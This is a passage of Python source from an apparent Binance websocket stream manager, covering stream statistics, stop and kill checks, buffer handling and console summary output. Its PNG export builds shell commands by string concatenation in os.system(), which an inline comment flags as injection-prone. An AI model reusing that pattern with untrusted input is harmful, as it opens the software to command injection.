logging.info("BinanceWebSocketApiManager.get_stream_subscriptions(" + str(stream_id) + ", " +
str(request_id) + ") payload added!")
return request_id
else:
return False
def get_stream_list(self):
"""
Get a list of all streams
:return: set
"""
# get the stream list
temp_stream_list = {}
for stream_id in self.stream_list:
temp_stream_list[stream_id] = self.get_stream_info(stream_id)
return temp_stream_list
def get_stream_receives_last_second(self, stream_id):
"""
Get the number of receives of specific stream from the last seconds
:param stream_id: id of a stream
:type stream_id: uuid
:return: int
"""
last_second_timestamp = int(time.time()) - 1
try:
return self.stream_list[stream_id]['receives_statistic_last_second']['entries'][last_second_timestamp]
except KeyError:
return 0
def get_stream_statistic(self, stream_id):
"""
Get the statistic of a specific stream
:param stream_id: id of a stream
:type stream_id: uuid
:return: set
"""
stream_statistic = {'stream_receives_per_second': 0,
'stream_receives_per_minute': 0,
'stream_receives_per_hour': 0,
'stream_receives_per_day': 0,
'stream_receives_per_month': 0,
'stream_receives_per_year': 0}
if self.stream_list[stream_id]['status'] == "running":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "stopped":
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif "crashed" in self.stream_list[stream_id]['status']:
stream_statistic['uptime'] = self.stream_list[stream_id]['has_stopped'] - self.stream_list[stream_id]['start_time']
elif self.stream_list[stream_id]['status'] == "restarting":
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
else:
stream_statistic['uptime'] = time.time() - self.stream_list[stream_id]['start_time']
try:
stream_receives_per_second = self.stream_list[stream_id]['processed_receives_total'] / stream_statistic['uptime']
except ZeroDivisionError:
stream_receives_per_second = 0
stream_statistic['stream_receives_per_second'] = stream_receives_per_second
if stream_statistic['uptime'] > 60:
stream_statistic['stream_receives_per_minute'] = stream_receives_per_second * 60
if stream_statistic['uptime'] > 60 * 60:
stream_statistic['stream_receives_per_hour'] = stream_receives_per_second * 60 * 60
if stream_statistic['uptime'] > 60 * 60 * 24:
stream_statistic['stream_receives_per_day'] = stream_receives_per_second * 60 * 60 * 24
if stream_statistic['uptime'] > 60 * 60 * 24 * 30:
stream_statistic['stream_receives_per_month'] = stream_receives_per_second * 60 * 60 * 24 * 30
if stream_statistic['uptime'] > 60 * 60 * 24 * 30 * 12:
stream_statistic['stream_receives_per_year'] = stream_receives_per_second * 60 * 60 * 24 * 30 * 12
return stream_statistic
def get_total_received_bytes(self):
"""
Get number of total received bytes
:return: int
"""
# how much bytes did we receive till now?
return self.total_received_bytes
def get_total_receives(self):
"""
Get the number of total receives
:return: int
"""
return self.total_receives
def get_user_agent(self):
"""
Get the user_agent string "lib name + lib version + python version"
:return:
"""
user_agent = f"{self.name}_{str(self.get_version())}-python_{str(platform.python_version())}"
return user_agent
def get_version(self):
"""
Get the package/module version
:return: str
"""
return self.version
def get_version_unicorn_fy(self):
"""
Get the package/module version of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_
:return: str
"""
from unicorn_fy.unicorn_fy import UnicornFy
unicorn_fy = UnicornFy()
return unicorn_fy.get_version()
@staticmethod
def help():
"""
Help in iPython
"""
print("Ctrl+D to close")
def increase_received_bytes_per_second(self, stream_id, size):
"""
Add the amount of received bytes per second
:param stream_id: id of a stream
:type stream_id: uuid
:param size: amount of bytes to add
:type size: int
"""
current_timestamp = int(time.time())
try:
if self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp]:
pass
except KeyError:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] = 0
try:
self.stream_list[stream_id]['transfer_rate_per_second']['bytes'][current_timestamp] += size
except KeyError:
pass
def increase_processed_receives_statistic(self, stream_id):
    """
    Add the number of processed receives
    :param stream_id: id of a stream
    :type stream_id: uuid
    :return: False if the stream is unknown, otherwise None
    """
    current_timestamp = int(time.time())
    try:
        self.stream_list[stream_id]['processed_receives_total'] += 1
    except KeyError:
        # unknown (or already removed) stream - nothing to count
        return False
    # Hold the per-stream lock for the whole check-and-increment. The original
    # released the lock between the failed lookup and the initializing write,
    # which could lose an increment under concurrent access.
    with self.stream_threading_lock[stream_id]['receives_statistic_last_second_lock']:
        entries = self.stream_list[stream_id]['receives_statistic_last_second']['entries']
        entries[current_timestamp] = entries.get(current_timestamp, 0) + 1
    with self.total_receives_lock:
        self.total_receives += 1
def increase_reconnect_counter(self, stream_id):
    """
    Increase the reconnect counters of one stream and of the manager.
    :param stream_id: id of a stream
    :type stream_id: uuid
    """
    stream_record = self.stream_list[stream_id]
    stream_record['logged_reconnects'].append(time.time())
    stream_record['reconnects'] += 1
    with self.reconnects_lock:
        self.reconnects += 1
def increase_transmitted_counter(self, stream_id):
    """
    Increase the counters of transmitted payloads (per stream and global).
    :param stream_id: id of a stream
    :type stream_id: uuid
    """
    stream_record = self.stream_list[stream_id]
    stream_record['processed_transmitted_total'] += 1
    with self.total_transmitted_lock:
        self.total_transmitted += 1
def is_manager_stopping(self):
    """
    Report whether the manager has a pending stop request.
    :return: bool - `True` if a stop was requested, `False` otherwise
    """
    return self.stop_manager_request is not None
def is_exchange_type(self, exchange_type=False):
    """
    Check the exchange type!
    :param exchange_type: Valid types are `dex` and `cex`!
    :type exchange_type: str
    :return: bool
    """
    if exchange_type is False:
        return False
    # closed sets of known endpoints instead of a long `or` chain
    dex_exchanges = {"binance.org",
                     "binance.org-testnet"}
    cex_exchanges = {"binance.com",
                     "binance.com-testnet",
                     "binance.com-margin",
                     "binance.com-margin-testnet",
                     "binance.com-isolated_margin",
                     "binance.com-isolated_margin-testnet",
                     "binance.com-futures",
                     "binance.com-futures-testnet",
                     "binance.je",
                     "binance.us",
                     "jex.com"}
    if self.exchange in dex_exchanges:
        is_type = "dex"
    elif self.exchange in cex_exchanges:
        is_type = "cex"
    else:
        # fixed missing space between "for" and "exchange=" in the log message
        logging.critical(f"BinanceWebSocketApiManager.is_exchange_type() - Can not determine exchange type for "
                         f"exchange={str(self.exchange)}")
        return False
    return is_type == exchange_type
def is_stop_request(self, stream_id, exclude_kill_requests=False):
    """
    Check whether a specific stream has a stop request.
    :param stream_id: id of a stream
    :type stream_id: uuid
    :param exclude_kill_requests: if `True` this method returns `False` on kill_requests
    :type exclude_kill_requests: bool
    :return: bool
    """
    logging.debug("BinanceWebSocketApiManager.is_stop_request(" + str(stream_id) + ")")
    try:
        stream = self.stream_list[stream_id]
        if stream['stop_request'] is True:
            return True
        if self.is_manager_stopping():
            return True
        return stream['kill_request'] is True and exclude_kill_requests is False
    except KeyError:
        # unknown stream -> no stop request
        return False
def is_stop_as_crash_request(self, stream_id):
    """
    Check whether a specific stream has a stop_as_crash_request.
    :param stream_id: id of a stream
    :type stream_id: uuid
    :return: bool
    """
    logging.debug("BinanceWebSocketApiManager.is_stop_as_crash_request(" + str(stream_id) + ")")
    try:
        if self.stream_list[stream_id]['crash_request'] is True:
            return True
    except KeyError:
        # unknown stream -> fall through to the manager-wide check
        pass
    return bool(self.is_manager_stopping())
def is_update_availabe(self):
    """
    Is a new release of this package available?
    :return: bool
    """
    installed_version = self.get_version()
    if ".dev" in installed_version:
        # strip the trailing ".dev" marker so dev builds compare against releases
        installed_version = installed_version[:-4]
    # call get_latest_version() only once - the original queried it twice,
    # which typically means two remote lookups
    latest_version = self.get_latest_version()
    if latest_version == installed_version or latest_version == "unknown":
        return False
    return True
def is_update_availabe_unicorn_fy(self):
    """
    Is a new release of `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ available?
    :return: bool
    """
    # local import keeps unicorn_fy an optional dependency of this module
    from unicorn_fy.unicorn_fy import UnicornFy
    return UnicornFy().is_update_availabe()
def is_update_availabe_check_command(self, check_command_version=False):
    """
    Is a new release of `check_lucit_collector.py` available?
    :param check_command_version: currently installed version of the check command
    :type check_command_version: str or bool
    :return: bool
    """
    installed_version = check_command_version
    latest_version = self.get_latest_version_check_command()
    if ".dev" in str(installed_version):
        # drop the trailing ".dev" marker before comparing against a release
        installed_version = installed_version[:-4]
    return latest_version != "unknown" and latest_version != installed_version
def kill_stream(self, stream_id):
    """
    Kill a specific stream
    :param stream_id: id of a stream
    :type stream_id: uuid
    :return: bool
    """
    # stop a specific stream by stream_id
    logging.info("BinanceWebSocketApiManager.kill_stream(" + str(stream_id) + ")")
    try:
        self.stream_list[stream_id]['kill_request'] = True
    except KeyError:
        # unknown stream_id - return False like stop_stream() does
        # (the original raised KeyError here and returned None on success
        # although the docstring promises a bool)
        return False
    return True
def pop_stream_data_from_stream_buffer(self, stream_buffer_name=False):
    """
    Get the oldest entry from the
    `stream_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_buffer%60>`_
    and remove it from the stack (FIFO stack)
    :param stream_buffer_name: `False` to read from generic stream_buffer, the stream_id if you used True in
                               create_stream() or the string name of a shared stream_buffer.
    :type stream_buffer_name: bool or str
    :return: stream_data - str, dict or False
    """
    if stream_buffer_name is False:
        buffer_lock = self.stream_buffer_lock
        buffer = self.stream_buffer
    else:
        try:
            buffer_lock = self.stream_buffer_locks[stream_buffer_name]
            buffer = self.stream_buffers[stream_buffer_name]
        except KeyError:
            # unknown shared stream_buffer name
            return False
    try:
        with buffer_lock:
            return buffer.pop(0)
    except IndexError:
        # buffer is empty
        return False
def pop_stream_signal_from_stream_signal_buffer(self):
    """
    Get the oldest entry from the
    `stream_signal_buffer <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/%60stream_signal_buffer%60>`_
    and remove it from the stack (FIFO stack)
    :return: stream_signal - dict or False
    """
    try:
        with self.stream_signal_buffer_lock:
            return self.stream_signal_buffer.pop(0)
    except IndexError:
        # no signal waiting
        return False
def print_stream_info(self, stream_id, add_string=""):
    """
    Print all infos about a specific stream, helps debugging :)
    :param stream_id: id of a stream
    :type stream_id: uuid
    :param add_string: text to add to the output
    :type add_string: str
    :return: bool
    """
    # Pre-initialize every optional report row as an empty string; rows are only
    # filled in when the corresponding data exists, so they vanish from the output.
    restart_requests_row = ""
    binance_api_status_row = ""
    stream_label_row = ""
    status_row = ""
    payload_row = ""
    symbol_row = ""
    dex_user_address_row = ""
    last_static_ping_listen_key = ""
    stream_info = self.get_stream_info(stream_id)
    stream_row_color_prefix = ""
    stream_row_color_suffix = ""
    if len(add_string) > 0:
        add_string = " " + str(add_string) + "\r\n"
    # Build a comma-separated list of reconnect timestamps (UTC) for this stream.
    try:
        if len(self.stream_list[stream_id]['logged_reconnects']) > 0:
            logged_reconnects_row = "\r\n logged_reconnects: "
            row_prefix = ""
            for timestamp in self.stream_list[stream_id]['logged_reconnects']:
                logged_reconnects_row += row_prefix + \
                                         datetime.utcfromtimestamp(timestamp).strftime('%Y-%m-%d, %H:%M:%S UTC')
                row_prefix = ", "
        else:
            logged_reconnects_row = ""
    except KeyError:
        # unknown stream_id
        return False
    # Choose an ANSI color for the status row: green for running (yellow if a
    # reconnect happened within the last 2 seconds), red for crashed, yellow for
    # restarting/stopped.
    if "running" in stream_info['status']:
        stream_row_color_prefix = "\033[1m\033[32m"
        stream_row_color_suffix = "\033[0m\r\n"
        for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
            if (time.time() - reconnect_timestamp) < 2:
                stream_row_color_prefix = "\033[1m\033[33m"
                stream_row_color_suffix = "\033[0m\r\n"
        status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
    elif "crashed" in stream_info['status']:
        stream_row_color_prefix = "\033[1m\033[31m"
        stream_row_color_suffix = "\033[0m\r\n"
        status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
    elif "restarting" in stream_info['status']:
        stream_row_color_prefix = "\033[1m\033[33m"
        stream_row_color_suffix = "\033[0m\r\n"
        status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
    elif "stopped" in stream_info['status']:
        stream_row_color_prefix = "\033[1m\033[33m"
        stream_row_color_suffix = "\033[0m\r\n"
        status_row = stream_row_color_prefix + " status: " + str(stream_info['status']) + stream_row_color_suffix
    try:
        if self.restart_requests[stream_id]['status']:
            restart_requests_row = " restart_request: " + self.restart_requests[stream_id]['status'] + "\r\n"
    except KeyError:
        pass
    # userData streams additionally show the last static listen-key ping
    if self.stream_list[stream_id]['markets'] == "!userData":
        last_static_ping_listen_key = " last_static_ping_listen_key: " + \
                                      str(self.stream_list[stream_id]['last_static_ping_listen_key']) + "\r\n"
    # colorize the Binance REST API status code (418 = IP ban -> red, other
    # non-200 -> yellow)
    if self.binance_api_status['status_code'] == 200:
        binance_api_status_code = str(self.binance_api_status['status_code'])
    elif self.binance_api_status['status_code'] == 418:
        binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + "\033[0m"
    else:
        binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + "\033[0m"
    binance_api_status_row = " binance_api_status: used_weight=" + str(self.binance_api_status['weight']) + \
                             ", status_code=" + str(binance_api_status_code) + " (last update " + \
                             str(datetime.utcfromtimestamp(
                                 self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
                             ")\r\n"
    current_receiving_speed = str(self.get_human_bytesize(self.get_current_receiving_speed(stream_id), "/s"))
    if self.stream_list[stream_id]['symbols'] is not False:
        symbol_row = " symbols:" + str(stream_info['symbols']) + "\r\n"
    if self.stream_list[stream_id]["payload"]:
        payload_row = " payload: " + str(self.stream_list[stream_id]["payload"]) + "\r\n"
    if self.stream_list[stream_id]["dex_user_address"] is not False:
        dex_user_address_row = " user_address: " + str(self.stream_list[stream_id]["dex_user_address"]) + "\r\n"
    if self.stream_list[stream_id]["stream_label"] is not None:
        stream_label_row = " stream_label: " + self.stream_list[stream_id]["stream_label"] + "\r\n"
    # format the websocket timing settings; ints get a " seconds" suffix,
    # anything else (e.g. None) is shown as-is
    if isinstance(stream_info['ping_interval'], int):
        ping_interval = f"{stream_info['ping_interval']} seconds"
    else:
        ping_interval = stream_info['ping_interval']
    if isinstance(stream_info['ping_timeout'], int):
        ping_timeout = f"{stream_info['ping_timeout']} seconds"
    else:
        ping_timeout = stream_info['ping_timeout']
    if isinstance(stream_info['close_timeout'], int):
        close_timeout = f"{stream_info['close_timeout']} seconds"
    else:
        close_timeout = stream_info['close_timeout']
    try:
        uptime = self.get_human_uptime(stream_info['processed_receives_statistic']['uptime'])
        # NOTE: the print() call mixes "+" concatenation with comma-separated
        # arguments, so print()'s default single-space separator is part of the
        # intended layout - do not "clean this up" without checking the output.
        print(str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
              " exchange:", str(self.stream_list[stream_id]['exchange']), "\r\n" +
              str(add_string) +
              " stream_id:", str(stream_id), "\r\n" +
              str(stream_label_row) +
              " channels (" + str(len(stream_info['channels'])) + "):", str(stream_info['channels']), "\r\n" +
              " markets (" + str(len(stream_info['markets'])) + "):", str(stream_info['markets']), "\r\n" +
              str(symbol_row) +
              " subscriptions: " + str(self.stream_list[stream_id]['subscriptions']) + "\r\n" +
              str(payload_row) +
              str(status_row) +
              str(dex_user_address_row) +
              f" ping_interval: {ping_interval}\r\n"
              f" ping_timeout: {ping_timeout}\r\n"
              f" close_timeout: {close_timeout}\r\n"
              " start_time:", str(stream_info['start_time']), "\r\n"
              " uptime:", str(uptime),
              "since " + str(
                  datetime.utcfromtimestamp(stream_info['start_time']).strftime('%Y-%m-%d, %H:%M:%S UTC')) +
              "\r\n" +
              " reconnects:", str(stream_info['reconnects']), logged_reconnects_row, "\r\n" +
              str(restart_requests_row) +
              str(binance_api_status_row) +
              str(last_static_ping_listen_key) +
              " last_heartbeat:", str(stream_info['last_heartbeat']), "\r\n"
              " seconds_to_last_heartbeat:", str(stream_info['seconds_to_last_heartbeat']), "\r\n"
              " kill_request:", str(stream_info['kill_request']), "\r\n"
              " stop_request:", str(stream_info['stop_request']), "\r\n"
              " has_stopped:", str(stream_info['has_stopped']), "\r\n"
              " seconds_since_has_stopped:",
              str(stream_info['seconds_since_has_stopped']), "\r\n"
              " current_receiving_speed:", str(current_receiving_speed), "\r\n" +
              " processed_receives:", str(stream_info['processed_receives_total']), "\r\n" +
              " transmitted_payloads:", str(self.stream_list[stream_id]['processed_transmitted_total']), "\r\n" +
              " stream_most_receives_per_second:",
              str(stream_info['receives_statistic_last_second']['most_receives_per_second']), "\r\n"
              " stream_receives_per_second:",
              str(stream_info['processed_receives_statistic']['stream_receives_per_second'].__round__(3)), "\r\n"
              " stream_receives_per_minute:",
              str(stream_info['processed_receives_statistic']['stream_receives_per_minute'].__round__(3)), "\r\n"
              " stream_receives_per_hour:",
              str(stream_info['processed_receives_statistic']['stream_receives_per_hour'].__round__(3)), "\r\n"
              " stream_receives_per_day:",
              str(stream_info['processed_receives_statistic']['stream_receives_per_day'].__round__(3)), "\r\n"
              "===============================================================================================\r\n")
    except KeyError:
        # NOTE(review): retry until the statistics keys exist - this recurses
        # without any delay or depth limit (possible RecursionError if the keys
        # never appear) and silently drops `add_string` on the retry. Confirm
        # whether a bounded retry is intended before changing it.
        self.print_stream_info(stream_id)
def print_summary(self, add_string="", disable_print=False):
    """
    Print an overview of all streams
    :param add_string: text to add to the output
    :type add_string: str
    :param disable_print: set to `True` to return the text instead of printing it
                          (used e.g. by curses based UIs and print_summary_to_png())
    :type disable_print: bool
    :return: str when `disable_print` is True, otherwise None; "" if stream_list
             could not be copied
    """
    # counters and pre-built (initially empty) report rows
    streams = len(self.stream_list)
    active_streams = 0
    crashed_streams = 0
    restarting_streams = 0
    stopped_streams = 0
    active_streams_row = ""
    restarting_streams_row = ""
    stopped_streams_row = ""
    all_receives_per_second = 0.0
    current_receiving_speed = 0
    streams_with_stop_request = 0
    stream_rows = ""
    crashed_streams_row = ""
    binance_api_status_row = ""
    received_bytes_per_x_row = ""
    streams_with_stop_request_row = ""
    stream_buffer_row = ""
    highest_receiving_speed_row = f"{str(self.get_human_bytesize(self.receiving_speed_peak['value'], '/s'))} " \
                                  f"(reached at " \
                                  f"{self.get_date_of_timestamp(self.receiving_speed_peak['timestamp'])})"
    if len(add_string) > 0:
        add_string = " " + str(add_string) + "\r\n"
    # deep-copy so the iteration below is not disturbed by concurrent stream
    # creation/removal; deepcopy raises RuntimeError if the dict changes size
    # while being copied
    try:
        temp_stream_list = copy.deepcopy(self.stream_list)
    except RuntimeError:
        return ""
    # build one table row per stream and collect the per-status counters
    for stream_id in temp_stream_list:
        stream_row_color_prefix = ""
        stream_row_color_suffix = ""
        current_receiving_speed += self.get_current_receiving_speed(stream_id)
        stream_statistic = self.get_stream_statistic(stream_id)
        if self.stream_list[stream_id]['status'] == "running":
            active_streams += 1
            all_receives_per_second += stream_statistic['stream_receives_per_second']
            # highlight freshly restarted streams in yellow
            try:
                if self.restart_requests[stream_id]['status'] == "restarted":
                    stream_row_color_prefix = "\033[1m\033[33m"
                    stream_row_color_suffix = "\033[0m"
            except KeyError:
                pass
            # highlight recent reconnects: red < 1s, yellow < 2s, green < 4s
            try:
                for reconnect_timestamp in self.stream_list[stream_id]['logged_reconnects']:
                    if (time.time() - reconnect_timestamp) < 1:
                        stream_row_color_prefix = "\033[1m\033[31m"
                        stream_row_color_suffix = "\033[0m"
                    elif (time.time() - reconnect_timestamp) < 2:
                        stream_row_color_prefix = "\033[1m\033[33m"
                        stream_row_color_suffix = "\033[0m"
                    elif (time.time() - reconnect_timestamp) < 4:
                        stream_row_color_prefix = "\033[1m\033[32m"
                        stream_row_color_suffix = "\033[0m"
            except KeyError:
                pass
        elif self.stream_list[stream_id]['status'] == "stopped":
            stopped_streams += 1
            stream_row_color_prefix = "\033[1m\033[33m"
            stream_row_color_suffix = "\033[0m"
        elif self.stream_list[stream_id]['status'] == "restarting":
            restarting_streams += 1
            stream_row_color_prefix = "\033[1m\033[33m"
            stream_row_color_suffix = "\033[0m"
        elif "crashed" in self.stream_list[stream_id]['status']:
            crashed_streams += 1
            stream_row_color_prefix = "\033[1m\033[31m"
            stream_row_color_suffix = "\033[0m"
        # truncate long labels so the table column stays 17 chars wide
        if self.stream_list[stream_id]['stream_label'] is not None:
            if len(self.stream_list[stream_id]['stream_label']) > 18:
                stream_label = str(self.stream_list[stream_id]['stream_label'])[:13] + "..."
            else:
                stream_label = str(self.stream_list[stream_id]['stream_label'])
        else:
            stream_label = str(self.stream_list[stream_id]['stream_label'])
        stream_rows += stream_row_color_prefix + str(stream_id) + stream_row_color_suffix + " |" + \
            self.fill_up_space_right(17, stream_label) + "|" + \
            self.fill_up_space_left(8, self.get_stream_receives_last_second(stream_id)) + "|" + \
            self.fill_up_space_left(11, stream_statistic['stream_receives_per_second'].__round__(2)) + "|" + \
            self.fill_up_space_left(8, self.stream_list[stream_id]['receives_statistic_last_second']['most_receives_per_second']) \
            + "|" + stream_row_color_prefix + \
            self.fill_up_space_left(8, len(self.stream_list[stream_id]['logged_reconnects'])) + \
            stream_row_color_suffix + "\r\n "
        if self.is_stop_request(stream_id, exclude_kill_requests=True) is True and \
                self.stream_list[stream_id]['status'] == "running":
            streams_with_stop_request += 1
    if streams_with_stop_request >= 1:
        stream_row_color_prefix = "\033[1m\033[33m"
        stream_row_color_suffix = "\033[0m"
        streams_with_stop_request_row = stream_row_color_prefix + " streams_with_stop_request: " + \
            str(streams_with_stop_request) + stream_row_color_suffix + "\r\n"
    if crashed_streams >= 1:
        stream_row_color_prefix = "\033[1m\033[31m"
        stream_row_color_suffix = "\033[0m"
        crashed_streams_row = stream_row_color_prefix + " crashed_streams: " + str(crashed_streams) \
            + stream_row_color_suffix + "\r\n"
    total_received_bytes = str(self.get_total_received_bytes()) + " (" + str(
        self.get_human_bytesize(self.get_total_received_bytes())) + ")"
    # ZeroDivisionError can occur right after start-up when time.time() still
    # equals self.start_time - the whole report is skipped in that case
    try:
        received_bytes_per_second = self.get_total_received_bytes() / (time.time() - self.start_time)
        received_bytes_per_x_row += str(self.get_human_bytesize(received_bytes_per_second, '/s')) + " (per day " + \
            str(((received_bytes_per_second / 1024 / 1024 / 1024) * 60 * 60 * 24).__round__(2)) \
            + " gB)"
        # stream_buffer rows are only shown (in blue) when items pile up
        if self.get_stream_buffer_length() > 50:
            stream_row_color_prefix = "\033[1m\033[34m"
            stream_row_color_suffix = "\033[0m"
            stream_buffer_row += stream_row_color_prefix + " stream_buffer_stored_items: " + \
                str(self.get_stream_buffer_length()) + "\r\n"
            stream_buffer_row += " stream_buffer_byte_size: " + str(self.get_stream_buffer_byte_size()) + \
                " (" + str(self.get_human_bytesize(self.get_stream_buffer_byte_size())) + ")" + \
                stream_row_color_suffix + "\r\n"
        if active_streams > 0:
            active_streams_row = " \033[1m\033[32mactive_streams: " + str(active_streams) + "\033[0m\r\n"
        if restarting_streams > 0:
            restarting_streams_row = " \033[1m\033[33mrestarting_streams: " + str(restarting_streams) + "\033[0m\r\n"
        if stopped_streams > 0:
            stopped_streams_row = " \033[1m\033[33mstopped_streams: " + str(stopped_streams) + "\033[0m\r\n"
        if self.binance_api_status['weight'] is not None:
            # colorize the REST status code: 418 (IP ban) red, other non-200 yellow
            if self.binance_api_status['status_code'] == 200:
                binance_api_status_code = str(self.binance_api_status['status_code'])
            elif self.binance_api_status['status_code'] == 418:
                binance_api_status_code = "\033[1m\033[31m" + str(self.binance_api_status['status_code']) + \
                    "\033[0m"
            else:
                binance_api_status_code = "\033[1m\033[33m" + str(self.binance_api_status['status_code']) + \
                    "\033[0m"
            binance_api_status_row = " binance_api_status: used_weight=" + \
                str(self.binance_api_status['weight']) + \
                ", status_code=" + str(binance_api_status_code) + " (last update " + \
                str(datetime.utcfromtimestamp(
                    self.binance_api_status['timestamp']).strftime('%Y-%m-%d, %H:%M:%S UTC')) + \
                ")\r\n"
        try:
            # NOTE(review): `stream_id` below is the loop variable leaking out of
            # the for-loop above; with an empty stream_list it is unbound, which
            # is exactly what the UnboundLocalError handler silently absorbs.
            print_text = (
                str(self.fill_up_space_centered(96, f" {self.get_user_agent()} ", "=")) + "\r\n" +
                " exchange: " + str(self.stream_list[stream_id]['exchange']) + "\r\n" +
                " uptime: " + str(self.get_human_uptime(time.time() - self.start_time)) + " since " +
                str(self.get_date_of_timestamp(self.start_time)) + "\r\n" +
                " streams: " + str(streams) + "\r\n" +
                str(active_streams_row) +
                str(crashed_streams_row) +
                str(restarting_streams_row) +
                str(stopped_streams_row) +
                str(streams_with_stop_request_row) +
                " subscriptions: " + str(self.get_number_of_all_subscriptions()) + "\r\n" +
                str(stream_buffer_row) +
                " current_receiving_speed: " + str(self.get_human_bytesize(current_receiving_speed, "/s")) + "\r\n" +
                " average_receiving_speed: " + str(received_bytes_per_x_row) + "\r\n" +
                " highest_receiving_speed: " + str(highest_receiving_speed_row) + "\r\n" +
                " total_receives: " + str(self.total_receives) + "\r\n"
                " total_received_bytes: " + str(total_received_bytes) + "\r\n"
                " total_transmitted_payloads: " + str(self.total_transmitted) + "\r\n" +
                str(binance_api_status_row) +
                " process_ressource_usage: cpu=" + str(self.get_process_usage_cpu()) + "%, memory=" +
                str(self.get_process_usage_memory()) + ", threads=" + str(self.get_process_usage_threads()) +
                "\r\n" + str(add_string) +
                " ---------------------------------------------------------------------------------------------\r\n"
                " stream_id | stream_label | last | average | most | recon\r\n"
                " ---------------------------------------------------------------------------------------------\r\n"
                " " + str(stream_rows) +
                "---------------------------------------------------------------------------------------------\r\n"
                " all_streams |" +
                self.fill_up_space_left(8, self.get_all_receives_last_second()) + "|" +
                self.fill_up_space_left(11, all_receives_per_second.__round__(2)) + "|" +
                self.fill_up_space_left(8, self.most_receives_per_second) + "|" +
                self.fill_up_space_left(8, self.reconnects) + "\r\n" +
                "===============================================================================================\r\n"
            )
            if disable_print:
                # NOTE(review): sys.platform is "win32" on Windows, so
                # startswith('Windows') is probably never True - confirm whether
                # platform.system() was intended here.
                if sys.platform.startswith('Windows'):
                    print_text = self.remove_ansi_escape_codes(print_text)
                return print_text
            else:
                print(print_text)
        except UnboundLocalError:
            pass
    except ZeroDivisionError:
        pass
def print_summary_to_png(self, print_summary_export_path, hight_per_row=12.5):
    """
    Create a PNG image file with the console output of `print_summary()`
    *LINUX ONLY* It should not be hard to make it OS independent:
    https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/issues/61
    :param print_summary_export_path: If you want to export the output of print_summary() to an image,
                                      please provide a path like "/var/www/html/". `View the Wiki!
                                      <https://github.com/oliver-zehentleitner/unicorn-binance-websocket-api/wiki/How-to-export-print_summary()-stdout-to-PNG%3F>`_
    :type print_summary_export_path: str
    :param hight_per_row: set the hight per row for the image hight calculation
    :type hight_per_row: int
    :return: bool
    """
    print_text = self.print_summary(disable_print=True)
    if not isinstance(print_text, str):
        # print_summary() can return None (e.g. before any stream exists);
        # bail out before writing a bogus "None" text file.
        return False
    # Todo:
    # 1. Handle paths right
    # 2. Use PythonMagick instead of Linux ImageMagick
    with open(print_summary_export_path + "print_summary.txt", 'w') as text_file:
        print(self.remove_ansi_escape_codes(print_text), file=text_file)
    image_hight = print_text.count("\n") * hight_per_row + 15
    # NOTE(review): os.system() with string concatenation is shell-injection
    # prone if `print_summary_export_path` contains shell metacharacters -
    # only call this with trusted paths. ("$(date)" below relies on the shell.)
    os.system('convert -size 720x' + str(image_hight) + ' xc:black -font "FreeMono" -pointsize 12 -fill white -annotate '
              '+30+30 "@' + print_summary_export_path + 'print_summary.txt' + '" ' +
              print_summary_export_path + 'print_summary_plain.png')
    os.system('convert ' + print_summary_export_path + 'print_summary_plain.png -font "FreeMono" '
              '-pointsize 12 -fill red -undercolor \'#00000080\' -gravity North -annotate +0+5 '
              '"$(date)" ' + print_summary_export_path + 'print_summary.png')
    return True
@staticmethod
def remove_ansi_escape_codes(text):
"""
Remove ansi excape codes from the text string!
:param text: str
:return:
"""
text = str(text)
text = text.replace("\033[1m\033[31m", "")
text = text.replace("\033[1m\033[32m", "")
text = text.replace("\033[1m\033[33m", "")
text = text.replace("\033[1m\033[34m", "")
text = text.replace("\033[0m", "")
return text
def replace_stream(self,
                   stream_id,
                   new_channels,
                   new_markets,
                   new_stream_label=None,
                   new_stream_buffer_name=False,
                   new_api_key=False,
                   new_api_secret=False,
                   new_symbols=False,
                   new_output="raw_data",
                   new_ping_interval=20,
                   new_ping_timeout=20,
                   new_close_timeout=10):
    """
    Replace a stream with a newly configured one.

    A new stream is started first; the old stream is only stopped once the new
    one has started, so the delivered data stays consistent.

    :param stream_id: id of the old stream
    :type stream_id: uuid
    :param new_channels: the new channel list for the stream
    :type new_channels: str, tuple, list, set
    :param new_markets: the new markets list for the stream
    :type new_markets: str, tuple, list, set
    :param new_stream_label: provide a stream_label to identify the stream
    :type new_stream_label: str
    :param new_stream_buffer_name: `False` for the generic stream_buffer, `True` to read via
                                   `pop_stream_data_from_stream_buffer(stream_id)`, or a string
                                   naming a shared stream_buffer.
    :type new_stream_buffer_name: bool or str
    :param new_api_key: provide a valid Binance API key
    :type new_api_key: str
    :param new_api_secret: provide a valid Binance API secret
    :type new_api_secret: str
    :param new_symbols: provide the symbols for isolated_margin user_data streams
    :type new_symbols: str
    :param new_output: "dict" to convert the raw data to a python dict, "UnicornFy" to convert with
                       `UnicornFy <https://github.com/oliver-zehentleitner/unicorn-fy>`_ - otherwise the
                       data is delivered as received from the endpoints
    :type new_output: str
    :param new_ping_interval: seconds between keepalive `Ping frames` (`None` disables); passed
                              through to `websockets.client.connect()
                              <https://websockets.readthedocs.io/en/stable/api.html?highlight=ping_interval#websockets.client.connect>`_
    :type new_ping_interval: int or None
    :param new_ping_timeout: seconds to wait for the `Pong frame` before the connection is closed
                             with code 1011 (`None` disables); passed through to
                             `websockets.client.connect()`
    :type new_ping_timeout: int or None
